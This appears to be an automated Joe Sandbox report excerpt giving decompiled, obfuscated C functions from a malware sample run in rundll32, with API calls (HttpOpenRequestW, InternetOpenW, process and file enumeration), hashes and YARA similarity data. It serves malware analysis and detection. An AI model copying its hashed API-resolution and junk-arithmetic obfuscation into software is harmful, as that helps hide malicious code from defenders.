				E04ED2309(0x1c8, __ecx, __ecx, 0xfc0d3d9c, __ecx, 0x9c9047d0);
				_t55 = GetVolumeInformationW(_a16, 0, 0, _t60, 0, 0, 0, 0); // executed
				return _t55;
			}














                                                                                                        0x04eea813
                                                                                                        0x04eea815
                                                                                                        0x04eea816
                                                                                                        0x04eea817
                                                                                                        0x04eea81a
                                                                                                        0x04eea81d
                                                                                                        0x04eea81e
                                                                                                        0x04eea81f
                                                                                                        0x04eea822
                                                                                                        0x04eea825
                                                                                                        0x04eea828
                                                                                                        0x04eea82b
                                                                                                        0x04eea82e
                                                                                                        0x04eea82f
                                                                                                        0x04eea831
                                                                                                        0x04eea832
                                                                                                        0x04eea837
                                                                                                        0x04eea841
                                                                                                        0x04eea848
                                                                                                        0x04eea84b
                                                                                                        0x04eea84e
                                                                                                        0x04eea855
                                                                                                        0x04eea86c
                                                                                                        0x04eea86f
                                                                                                        0x04eea876
                                                                                                        0x04eea87d
                                                                                                        0x04eea884
                                                                                                        0x04eea88b
                                                                                                        0x04eea892
                                                                                                        0x04eea8a3
                                                                                                        0x04eea8a6
                                                                                                        0x04eea8aa
                                                                                                        0x04eea8ae
                                                                                                        0x04eea8b5
                                                                                                        0x04eea8c0
                                                                                                        0x04eea8c3
                                                                                                        0x04eea8d6
                                                                                                        0x04eea8e8
                                                                                                        0x04eea8ef

                                                                                                        APIs
                                                                                                        • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 04EEA8E8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InformationVolume
                                                                                                        • String ID: ,r$cu_
                                                                                                        • API String ID: 2039140958-355032270
                                                                                                        • Opcode ID: 11f0a768391377fe69868ce35b1527178b61e9fcd2d284546a7f3ae16540a2da
                                                                                                        • Instruction ID: 89db24f0504392ef0ef5efed3ef28a59a02254091e0df2bdd589b459c6983a0f
                                                                                                        • Opcode Fuzzy Hash: 11f0a768391377fe69868ce35b1527178b61e9fcd2d284546a7f3ae16540a2da
                                                                                                        • Instruction Fuzzy Hash: ED21E0B1801249BB8F14CFA6DD49C9FBFB9EB86704F108099F910A2260D3B59A15DFA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 04EDBEDE, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • QueryFullProcessImageNameW.KERNEL32(007CD4C5,00000000,00000000,31305EC1), ref: 04EDBFB0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FullImageNameProcessQuery
                                                                                                        • String ID: =.$^.c
                                                                                                        • API String ID: 3578328331-3776521896
                                                                                                        • Opcode ID: 07ae75dd8ddba432c77965de32a51c1b19153ce4c2545f6c391e89c1662625bf
                                                                                                        • Instruction ID: 76b0742044da6a3e3237b5f9d70b933452927bdf9a688ce0acce9e0274b10423
                                                                                                        • Opcode Fuzzy Hash: 07ae75dd8ddba432c77965de32a51c1b19153ce4c2545f6c391e89c1662625bf
                                                                                                        • Instruction Fuzzy Hash: 5A210475C00209BBDF59DFA4C94AAEEBFB1FB44704F208588E91476250D3B69B619F90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 04EDFBFA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 91%
                                                                                                        			E04EDFBFA(void* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t48;
				int _t57;
				signed int _t59;

				_push(_a8);
				_push(_a4);
				E04EF2523(_t48);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x49672e;
				_v32 = 0xb6dd69;
				_v16 = 0x714492;
				_v16 = _v16 >> 4;
				_v16 = _v16 + 0x8cae;
				_v16 = _v16 + 0xf12f;
				_v16 = _v16 ^ 0x0001c43a;
				_v20 = 0xe1aff5;
				_v20 = _v20 + 0x563d;
				_v20 = _v20 ^ 0x00ec4f92;
				_v12 = 0xff415;
				_v12 = _v12 + 0x39cf;
				_v12 = _v12 | 0x79f6ff5d;
				_v12 = _v12 ^ 0x79f7d296;
				_v8 = 0xdebe32;
				_t59 = 0x1e;
				_v8 = _v8 / _t59;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 ^ 0x0002d9b6;
				E04ED2309(0x336, _t59, _t59, 0xd09d8658, _t59, 0x9c9047d0);
				_t57 = FindClose(_a8); // executed
				return _t57;
			}














                                                                                                        0x04edfc00
                                                                                                        0x04edfc03
                                                                                                        0x04edfc08
                                                                                                        0x04edfc0d
                                                                                                        0x04edfc14
                                                                                                        0x04edfc1a
                                                                                                        0x04edfc21
                                                                                                        0x04edfc28
                                                                                                        0x04edfc2f
                                                                                                        0x04edfc33
                                                                                                        0x04edfc3a
                                                                                                        0x04edfc41
                                                                                                        0x04edfc48
                                                                                                        0x04edfc4f
                                                                                                        0x04edfc56
                                                                                                        0x04edfc5d
                                                                                                        0x04edfc64
                                                                                                        0x04edfc6b
                                                                                                        0x04edfc72
                                                                                                        0x04edfc79
                                                                                                        0x04edfc85
                                                                                                        0x04edfc8d
                                                                                                        0x04edfc90
                                                                                                        0x04edfc94
                                                                                                        0x04edfc98
                                                                                                        0x04edfcb8
                                                                                                        0x04edfcc3
                                                                                                        0x04edfcc8

                                                                                                        APIs
                                                                                                        • FindClose.KERNEL32(0001C43A), ref: 04EDFCC3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseFind
                                                                                                        • String ID: .gI$=V
                                                                                                        • API String ID: 1863332320-2530093900
                                                                                                        • Opcode ID: 110af252eeec9babbf3e3997d431909c73a56f909e67471b0c3fb51db6a30985
                                                                                                        • Instruction ID: d92f94fcbc056f8bcdd3a6307895c1b1abb150f1e54009f4e8d802ac1137d28d
                                                                                                        • Opcode Fuzzy Hash: 110af252eeec9babbf3e3997d431909c73a56f909e67471b0c3fb51db6a30985
                                                                                                        • Instruction Fuzzy Hash: C12147B1D0020CEFEB04DFD5C94A9EEBBB0FB54318F10C099E62466240E3B95B549F90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 04EEE9E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 76%
                                                                                                        			E04EEE9E8(void* __ecx, void* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t39;
				int _t47;
				void* _t51;

				_push(_a16);
				_t51 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E04EF2523(_t39);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x7dd1c2;
				_v20 = 0xe6ed41;
				_v20 = _v20 ^ 0x6eedbecd;
				_v20 = _v20 * 0x45;
				_v20 = _v20 ^ 0xa90eba26;
				_v16 = 0x25fde1;
				_v16 = _v16 + 0xffffc5d1;
				_v16 = _v16 | 0x325ad611;
				_v16 = _v16 ^ 0x3277e624;
				_v8 = 0x448e1b;
				_v8 = _v8 | 0xd7f3ffef;
				_v8 = _v8 ^ 0xcff08007;
				_v8 = _v8 ^ 0x180d74c6;
				_v12 = 0x3a9cbc;
				_v12 = _v12 | 0xfe729dd7;
				_v12 = _v12 ^ 0xfe7a3202;
				E04ED2309(0x2de, __ecx, __ecx, 0xa7d3fbc8, __ecx, 0x9c9047d0);
				_t47 = FindNextFileW(_t51, _a4); // executed
				return _t47;
			}












                                                                                                        0x04eee9ef
                                                                                                        0x04eee9f2
                                                                                                        0x04eee9f4
                                                                                                        0x04eee9f7
                                                                                                        0x04eee9fa
                                                                                                        0x04eee9fe
                                                                                                        0x04eee9ff
                                                                                                        0x04eeea04
                                                                                                        0x04eeea0b
                                                                                                        0x04eeea12
                                                                                                        0x04eeea19
                                                                                                        0x04eeea30
                                                                                                        0x04eeea33
                                                                                                        0x04eeea3a
                                                                                                        0x04eeea41
                                                                                                        0x04eeea48
                                                                                                        0x04eeea4f
                                                                                                        0x04eeea56
                                                                                                        0x04eeea5d
                                                                                                        0x04eeea64
                                                                                                        0x04eeea6b
                                                                                                        0x04eeea72
                                                                                                        0x04eeea79
                                                                                                        0x04eeea80
                                                                                                        0x04eeea99
                                                                                                        0x04eeeaa5
                                                                                                        0x04eeeaab

                                                                                                        APIs
                                                                                                        • FindNextFileW.KERNELBASE(00000000,FE7A3202,?,?,?,?,?,?,?,?,?,?,00000072), ref: 04EEEAA5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileFindNext
                                                                                                        • String ID: $w2$A
                                                                                                        • API String ID: 2029273394-2068021171
                                                                                                        • Opcode ID: 489ae82eb01001db2e27a8813198e8620566e78ec9ea4fd3dbf43d66dbc97652
                                                                                                        • Instruction ID: 51480dc49e61f95454b54e7b6e2433ed70794f0fc2c8877a21ce8705ae381f5e
                                                                                                        • Opcode Fuzzy Hash: 489ae82eb01001db2e27a8813198e8620566e78ec9ea4fd3dbf43d66dbc97652
                                                                                                        • Instruction Fuzzy Hash: 951112B1C0121DAFDF05DFE8DA068AEBFB4FB00304F108589E915B6260E3B55B209F95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 04ED8A5E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 47%
                                                                                                        			E04ED8A5E(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a24, WCHAR* _a36, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, WCHAR* _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t45;
				void* _t52;
				void* _t57;

				_push(_a56);
				_t57 = __edx;
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04EF2523(_t45);
				_v32 = 0xd5d112;
				_v28 = 0x50513d;
				_v24 = 0;
				_v12 = 0x46c43;
				_v12 = _v12 + 0xffffdfef;
				_v12 = _v12 | 0x9d8b3e1d;
				_v12 = _v12 ^ 0x9d8347af;
				_v20 = 0x816eb9;
				_v20 = _v20 + 0xffff29e2;
				_v20 = _v20 ^ 0x0080c9d8;
				_v8 = 0x807982;
				_v8 = _v8 | 0x5015719e;
				_v8 = _v8 ^ 0xfbfa9e2f;
				_v8 = _v8 ^ 0xab6f9dce;
				_v16 = 0xec1576;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x000e8763;
				E04ED2309(0x18c, __ecx, __ecx, 0xb50c381d, __ecx, 0xc0cf1a4);
				_t52 = HttpOpenRequestW(_t57, _a36, _a56, 0, 0, 0, _a24, 0); // executed
				return _t52;
			}













                                                                                                        0x04ed8a66
                                                                                                        0x04ed8a6b
                                                                                                        0x04ed8a6d
                                                                                                        0x04ed8a70
                                                                                                        0x04ed8a73
                                                                                                        0x04ed8a76
                                                                                                        0x04ed8a77
                                                                                                        0x04ed8a7a
                                                                                                        0x04ed8a7b
                                                                                                        0x04ed8a7c
                                                                                                        0x04ed8a7f
                                                                                                        0x04ed8a80
                                                                                                        0x04ed8a83
                                                                                                        0x04ed8a86
                                                                                                        0x04ed8a89
                                                                                                        0x04ed8a8c
                                                                                                        0x04ed8a8d
                                                                                                        0x04ed8a8e
                                                                                                        0x04ed8a93
                                                                                                        0x04ed8a9d
                                                                                                        0x04ed8aa4
                                                                                                        0x04ed8aa7
                                                                                                        0x04ed8aae
                                                                                                        0x04ed8ab5
                                                                                                        0x04ed8abc
                                                                                                        0x04ed8ac3
                                                                                                        0x04ed8aca
                                                                                                        0x04ed8ad1
                                                                                                        0x04ed8ad8
                                                                                                        0x04ed8adf
                                                                                                        0x04ed8ae6
                                                                                                        0x04ed8aed
                                                                                                        0x04ed8af4
                                                                                                        0x04ed8afb
                                                                                                        0x04ed8aff
                                                                                                        0x04ed8b24
                                                                                                        0x04ed8b3a
                                                                                                        0x04ed8b41

                                                                                                        APIs
                                                                                                        • HttpOpenRequestW.WININET(?,?,?,00000000,00000000,00000000,00D5D112,00000000), ref: 04ED8B3A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: HttpOpenRequest
                                                                                                        • String ID: =QP
                                                                                                        • API String ID: 1984915467-456757808
                                                                                                        • Opcode ID: 4cc3d4786cdcc23149290c3469cd4bf7c683ba33055c948049ab044fbc38bf75
                                                                                                        • Instruction ID: cad95947b44ed418702ade2526c823db442dadaa967ce2061d500ef64985b0b4
                                                                                                        • Opcode Fuzzy Hash: 4cc3d4786cdcc23149290c3469cd4bf7c683ba33055c948049ab044fbc38bf75
                                                                                                        • Instruction Fuzzy Hash: 8621F3B2801209BB8F559F95CC49CDFBF79EF85704F109188BA1466220D3B18A65DFA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 04EE42E4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 73%
                                                                                                        			E04EE42E4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t43;
				char _t54;
				signed int _t57;
				void* _t62;
				void* _t63;

				_push(_a20);
				_t62 = __edx;
				_push(_a16);
				_t63 = __ecx;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04EF2523(_t43);
				_v36 = 0xead706;
				_v32 = 0x8aaadf;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0x3b6f9b;
				_t57 = 0x3f;
				_v12 = _v12 * 0xe;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x1a7fe3f0;
				_v20 = 0x6318b1;
				_v20 = _v20 | 0x2b2fc1f2;
				_v20 = _v20 ^ 0x2b6f417a;
				_v8 = 0xeb56a2;
				_v8 = _v8 << 1;
				_v8 = _v8 / _t57;
				_v8 = _v8 * 0x2f;
				_v8 = _v8 ^ 0x015d5ff9;
				_v16 = 0x2619ef;
				_v16 = _v16 << 6;
				_v16 = _v16 ^ 0x098e35d6;
				E04ED2309(_t57 + 0x4d, _t57, _t57, 0x52f9059f, _t57, 0x9c9047d0);
				_t54 = RtlFreeHeap(_t62, 0, _t63); // executed
				return _t54;
			}
















                                                                                                        0x04ee42ed
                                                                                                        0x04ee42f2
                                                                                                        0x04ee42f4
                                                                                                        0x04ee42f7
                                                                                                        0x04ee42f9
                                                                                                        0x04ee42fa
                                                                                                        0x04ee42fd
                                                                                                        0x04ee4300
                                                                                                        0x04ee4301
                                                                                                        0x04ee4302
                                                                                                        0x04ee4307
                                                                                                        0x04ee4311
                                                                                                        0x04ee431a
                                                                                                        0x04ee431d
                                                                                                        0x04ee4320
                                                                                                        0x04ee432d
                                                                                                        0x04ee4334
                                                                                                        0x04ee4337
                                                                                                        0x04ee433b
                                                                                                        0x04ee4342
                                                                                                        0x04ee4349
                                                                                                        0x04ee4350
                                                                                                        0x04ee4357
                                                                                                        0x04ee435e
                                                                                                        0x04ee436b
                                                                                                        0x04ee4377
                                                                                                        0x04ee437a
                                                                                                        0x04ee4381
                                                                                                        0x04ee4388
                                                                                                        0x04ee438c
                                                                                                        0x04ee439f
                                                                                                        0x04ee43aa
                                                                                                        0x04ee43b2

                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,072B1AC5,00000000,00000000), ref: 04EE43AA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID: zAo+
                                                                                                        • API String ID: 3298025750-440923707
                                                                                                        • Opcode ID: 782d704bb29470d0423d04c6355d4fda0cb05a54fe280a973ff5c90c0f5ad215
                                                                                                        • Instruction ID: 9683d8168941c3d1be4c8c559f5bdfb05627b250e177507578277600a3195022
                                                                                                        • Opcode Fuzzy Hash: 782d704bb29470d0423d04c6355d4fda0cb05a54fe280a973ff5c90c0f5ad215
                                                                                                        • Instruction Fuzzy Hash: 482128B1D00219BF9B08DF99D98A8EEBFB9FB44344F508199E515A7240D3B16B149B90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 04EDF2CC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 24%
                                                                                                        			E04EDF2CC(void* __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a32) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				void* __ecx;
				void* _t36;
				void* _t44;
				void* _t46;

				_push(_a32);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E04EF2523(_t36);
				_v28 = 0x481ca4;
				_v24 = 0;
				_v20 = 0xca1952;
				_v20 = _v20 ^ 0x1684c8f8;
				_v20 = _v20 ^ 0x16482d99;
				_v12 = 0xc193bc;
				_v12 = _v12 ^ 0x27e4a297;
				_v12 = _v12 | 0xa7673761;
				_v12 = _v12 ^ 0xa76f04da;
				_v8 = 0xc5b902;
				_push(0xc0cf1a4);
				_push(_t45);
				_push(0xb325898b);
				_push(_t45);
				_v8 = _v8 * 0x4e;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x03c56f69;
				_v16 = 0x24ec4f;
				_v16 = _v16 + 0xffffc13d;
				_v16 = _v16 ^ 0x002fbbc3;
				_push(_t45);
				_t46 = 0x50;
				E04ED2309(_t46);
				_t44 = InternetOpenW(0, _a12, 0, 0, 0); // executed
				return _t44;
			}













                                                                                                        0x04edf2d3
                                                                                                        0x04edf2d8
                                                                                                        0x04edf2d9
                                                                                                        0x04edf2da
                                                                                                        0x04edf2db
                                                                                                        0x04edf2dc
                                                                                                        0x04edf2df
                                                                                                        0x04edf2e2
                                                                                                        0x04edf2e7
                                                                                                        0x04edf2ec
                                                                                                        0x04edf2f6
                                                                                                        0x04edf2f9
                                                                                                        0x04edf300
                                                                                                        0x04edf307
                                                                                                        0x04edf30e
                                                                                                        0x04edf315
                                                                                                        0x04edf31c
                                                                                                        0x04edf323
                                                                                                        0x04edf32a
                                                                                                        0x04edf335
                                                                                                        0x04edf33a
                                                                                                        0x04edf33b
                                                                                                        0x04edf340
                                                                                                        0x04edf341
                                                                                                        0x04edf344
                                                                                                        0x04edf348
                                                                                                        0x04edf34f
                                                                                                        0x04edf356
                                                                                                        0x04edf35d
                                                                                                        0x04edf370
                                                                                                        0x04edf373
                                                                                                        0x04edf374
                                                                                                        0x04edf383
                                                                                                        0x04edf389

                                                                                                        APIs
                                                                                                        • InternetOpenW.WININET(00000000,16482D99,00000000,00000000,00000000), ref: 04EDF383
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InternetOpen
                                                                                                        • String ID: O$
                                                                                                        • API String ID: 2038078732-838329570
                                                                                                        • Opcode ID: bfd598ea9fc20005dd18c51756325e876dca57c81b5a8b40325e3a3f8c113345
                                                                                                        • Instruction ID: b28519d9cb7500d79d3d9aa510a2ca379a27016263bda538a950dcbe4810f22b
                                                                                                        • Opcode Fuzzy Hash: bfd598ea9fc20005dd18c51756325e876dca57c81b5a8b40325e3a3f8c113345
                                                                                                        • Instruction Fuzzy Hash: 9C1144B0C0121DBB9B15DFA5CC4A8DFBFB8EF05754F108589F914B6110C3B15A54DBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 04EEA4A0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 19%
                                                                                                        			E04EEA4A0(void* __ecx, void* __edx, intOrPtr _a4, struct tagPROCESSENTRY32W _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t40;
				int _t49;
				void* _t51;
				void* _t54;

				_push(_a8);
				_t54 = __ecx;
				_push(_a4);
				_push(__ecx);
				E04EF2523(_t40);
				_v36 = 0x141422;
				asm("stosd");
				_push(0x9c9047d0);
				asm("stosd");
				_push(__ecx);
				_push(0xb41b9fb1);
				_push(__ecx);
				asm("stosd");
				_v20 = 0x6e8e4;
				_v20 = _v20 << 1;
				_push(__ecx);
				_t51 = 0x1c;
				_v20 = _v20 * 0x65;
				_v20 = _v20 ^ 0x05792b89;
				_v8 = 0x17694a;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 + 0x7593;
				_v8 = _v8 + 0x3dc6;
				_v8 = _v8 ^ 0x000c8dea;
				_v16 = 0x6183ab;
				_v16 = _v16 << 3;
				_v16 = _v16 | 0x753fc9cb;
				_v16 = _v16 ^ 0x773f8770;
				_v12 = 0x2bda5d;
				_v12 = _v12 + 0xffff2e51;
				_v12 = _v12 ^ 0x7ae43c2f;
				_v12 = _v12 ^ 0x7acc85af;
				E04ED2309(_t51);
				_t49 = Process32NextW(_t54, _a8); // executed
				return _t49;
			}













                                                                                                        0x04eea4a8
                                                                                                        0x04eea4ab
                                                                                                        0x04eea4ad
                                                                                                        0x04eea4b1
                                                                                                        0x04eea4b2
                                                                                                        0x04eea4b7
                                                                                                        0x04eea4c6
                                                                                                        0x04eea4c7
                                                                                                        0x04eea4cc
                                                                                                        0x04eea4cd
                                                                                                        0x04eea4ce
                                                                                                        0x04eea4d3
                                                                                                        0x04eea4d4
                                                                                                        0x04eea4d5
                                                                                                        0x04eea4dc
                                                                                                        0x04eea4e3
                                                                                                        0x04eea4e6
                                                                                                        0x04eea4e7
                                                                                                        0x04eea4ea
                                                                                                        0x04eea4f1
                                                                                                        0x04eea4f8
                                                                                                        0x04eea4fc
                                                                                                        0x04eea503
                                                                                                        0x04eea50a
                                                                                                        0x04eea511
                                                                                                        0x04eea518
                                                                                                        0x04eea51c
                                                                                                        0x04eea523
                                                                                                        0x04eea52a
                                                                                                        0x04eea531
                                                                                                        0x04eea538
                                                                                                        0x04eea53f
                                                                                                        0x04eea552
                                                                                                        0x04eea55e
                                                                                                        0x04eea565

                                                                                                        APIs
                                                                                                        • Process32NextW.KERNEL32(00000000,773F8770,?,?,?,?,?,?,?,?,00000000), ref: 04EEA55E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: NextProcess32
                                                                                                        • String ID: /<z
                                                                                                        • API String ID: 1850201408-2186077011
                                                                                                        • Opcode ID: ee7739c6ebbc081d39b179a51fe32828a234b3ca8a11d0ef1921ab7f81e9d2f1
                                                                                                        • Instruction ID: 778c36009299ec7ae74cf590a8b2d66a919d9d4c592dfc11710c8ecd8a373af1
                                                                                                        • Opcode Fuzzy Hash: ee7739c6ebbc081d39b179a51fe32828a234b3ca8a11d0ef1921ab7f81e9d2f1
                                                                                                        • Instruction Fuzzy Hash: 18215675C01219FBDF04CF95C8098EEBBB4FB44314F108589E418A6250D3B96B459F90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 04EDE0A2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetNativeSystemInfo.KERNEL32 ref: 04EDE168
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
